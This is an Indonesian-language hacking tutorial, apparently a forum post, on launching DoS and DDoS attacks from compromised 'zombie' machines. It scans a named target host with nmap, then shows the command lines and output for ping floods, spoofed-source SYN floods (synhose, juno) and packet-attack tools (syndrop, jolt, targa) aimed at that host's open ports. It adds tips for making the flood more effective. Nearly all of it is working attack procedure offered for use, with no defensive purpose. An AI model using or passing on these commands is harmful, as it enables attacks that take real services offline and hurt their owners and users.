ddos dilakukan dari banyak zombie kita yaitu mesin-mesin yang sudah kita owned dan boleh dimanfaatkan untuk serangan
dos adalah serangan yang berasal hanya dari 1 mesin saja!!!
Sebelum melakukan DOS atau DDOS Anda wajib mengetahui port - port daemon
yang terbuka di target kita, misal kita menggunakan nmap port scanner untuk target kita sec-r1z.com, satu hal yang wajib diingat oleh tiap cracker (nama domain sec-r1z.com hanyalah sekedar contoh)
yang ingin melakukan dos maupun ddos adalah sebaiknya tidak menyerang alamat ip target tapi menyerang domain / hostname karena alamat ip bisa diubah sewaktu-waktu untuk menhindari dos maupun ddos.
Sebelum ddos maupun dos mari kita scan daemon -daemon yang terbuka untuk
celah bagi kita menyerang, berikut ini contoh penggunaan scanning port dengan nmap:
bt ~ # nmap -A sec-r1z.com -PN
Starting Nmap 4.60 ( http://nmap.org/ ) at 2010-03-22 04:33 GMT
Interesting ports on 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86):
Not shown: 1668 closed ports, 36 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
|_ Anonymous FTP: FTP: Anonymous login allowed
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.69
| SMTP: Responded to EHLO command
| b0x.sec-r1z.com Hello example.org [111.94.9.19]
| SIZE 52428800
| PIPELINING
| AUTH PLAIN LOGIN
| STARTTLS
| 250 HELP
| Responded to HELP command
| Commands supported:
|_ AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp open domain
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2008)
443/tcp open http Apache httpd 2.0.63
|_ HTML title: Site doesn't have a title.
465/tcp open ssl/smtp Exim smtpd 4.69
| SSLv2: server still supports SSLv2
|_ the server didn't offer any cyphers
993/tcp open ssl/imap Courier Imapd (released 2008)
| SSLv2: server still supports SSLv2
|_ the server didn't offer any cyphers
995/tcp open ssl/pop3 Courier pop3d
| SSLv2: server still supports SSLv2
|_ the server didn't offer any cyphers
3306/tcp open mysql MySQL 5.0.90-community
| MySQL Server Information: Protocol: 10
| Version: 5.0.90-community
| Thread ID: 9230
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_ Salt: @Te"s?}zn9nA:?l"cM6e
Device type: storage-misc
Running (JUST GUESSING) : BlueArc embedded (91%)
Aggressive OS guesses: BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: b0x.sec-r1z.com
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 0.09 192.168.153.2
2 280.82 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86)
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.436 seconds
bt ~ #
dari hasil scan ke sec-r1z.com kita boleh lihat kalau port-port berikut ini terbuka sehingga memungkinkan serangan kita:
21
22
25
53
110
143
443
465
993
995
3306
Jadi kita boleh menggempur target kita ke semua port tersebut.
Tips!!!
Agar DDOS lebih efektif sebaiknya serang semua port daemon yang terbuka
dan bagi yg port 80 open serangan difokuskan lebih ke port 80.
Aneka Tool & Teknik Untuk DOS / DDOS
ICMP ATTACK
bt ~ # ping sec-r1z.com
PING sec-r1z.com (74.63.241.86) 56(84) bytes of data.
64 bytes from 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): icm=10 ttl=128 time=273 ms
[2]+ Stopped ping sec-r1z.com
bt ~ #
Ok kita boleh melihat ketika kita ping sec-r1z.com dan ipnya diresolve ke 74.63.241.86 dan juga direply langsung olehnya :
reply 64 bytes dari 74.63.241.86 yang menandakan kita bisa menambahkan efek serangan icmp ke target kita.
Contoh Teknik dasar untuk melakukan ping flood dari root shell unix atau linux kita, ketikkan ini (misal target host adalah sec-r1z.com):
ping sec-r1z.com -fs 50000
PING sec-r1z.com (74.63.241.86) 50000(50028) bytes of data.
.......................................................
[3]+ Stopped ping sec-r1z.com -fs 50000
SYN Attack
SEcara default jika tidak diset di argumen maka synhose akan menyerang port 80, boleh kita lihat di sourcenya:
if(port == 0) port = 80;
Misalnya kita akan menyerang sec-r1z.com di port terbuka 80 dari 10 spoof ip berbeza contohnya:
bt ~ # ./synhose sec-r1z.com 80 10
SynHose [A random source IP syn flooder]
Written by knight / Idea by : rza
Destination : sec-r1z.com
Port : 80
NumberOfTimes: 10
SynHosing sec-r1z.com at port 80 from 108.248.253.31 port 2884
SynHosing sec-r1z.com at port 80 from 248.36.16.139 port 4
SynHosing sec-r1z.com at port 80 from 68.48.179.170 port 409
SynHosing sec-r1z.com at port 80 from 5.54.172.218 port 9780
SynHosing sec-r1z.com at port 80 from 156.228.227.167 port 5327
SynHosing sec-r1z.com at port 80 from 108.99.240.141 port 1746
SynHosing sec-r1z.com at port 80 from 242.249.38.240 port 924
SynHosing sec-r1z.com at port 80 from 111.233.60.127 port 4544
SynHosing sec-r1z.com at port 80 from 60.194.164.239 port 4234
SynHosing sec-r1z.com at port 80 from 174.243.162.91 port 8044
bt ~ #
Juno
Juno merupakan syn attack tool yang cukup terkenal, berikut ini adalah contoh cara pakainya (misalnya target adalah sec-r1z.com di port 80):
bt ~ # ./juno sec-r1z.com 80
juno.c by Sorcerer of DALnet
death to 74.63.241.86:80
syndrop
Syndrop merupakan tool yang mengabungkan syn attack dan teardrop,berikut ini adalah contoh penggunaan syndrop dengan target host sec-r1z:
bt ~ # ./syndrop 127.0.0.1 sec-r1z.com -s 31337 -t 80 -n 99999999 -S 20 -E 9999
syndrop by PineKoan
Death on flaxen wings:
From: 127.0.0.1.31337
To: 74.63.241.86. 80
Amt: 99999999
[ b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m b00m
Jolt
Jika dilihat dari source codenya,Jolt merupakan salah satu tool untuk DOS yang akan mengirimkan paket icmp ke target kita, Pada zaman dahulu kala jolt ini banyak digunakan untuk membekukan server - server windows
jenis serangan adalah pengiriman paket icmp
icmp->type = ICMP_ECHO;
Berikut ini demo penggunaan jolt:
bt ~ # ./jolt 74.63.241.86 127.0.0.1 99999999
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
Sending to 74.63.241.86
..................dst
Targa
Targa merupakan tool dos yang merupakan kombinasi dari tool2 ini:
* bonk by route|daemon9 & klepto
* jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
* land by m3lt
* nestea by humble & ttol
* newtear by route|daemon9
* syndrop by PineKoan
* teardrop by route|daemon9
* winnuke by _eci
header2 file yang digunakan oleh targa cukup, juga dan tidak ada di backtrack secara default, jadi saya tambahkan sendiri, berikut ini header file saya di /usr/include/netinet sehingga berhasil mengcompile targa.c:
bt netinet # ls
ether.h if_ether.h if_tr.h in.h ip.h ip_icmp.h ip_udp.h protocols.h udp.h
icmp6.h if_fddi.h igmp.h in_systm.h ip6.h ip_tcp.h protocol.h tcp.h
bt netinet #
Misalnya kita ingin menyerang seluruh range ip dari range ip 74.63.241.86-74.63.241.88
Berikut adalah contohnya:
bt ~ # ./targa 74.63.241.86 74.63.241.88 -t 0 -n 999999
targa 1.0 by Mixter
Leetness on faxen wings:
To: 74.63.241.86 - 74.63.241.88
Repeats: 999999
Type: 0
74.63.241.86 [ $$$$$$$$$$$$$$$@@@@@@@@@@@@@@@-----
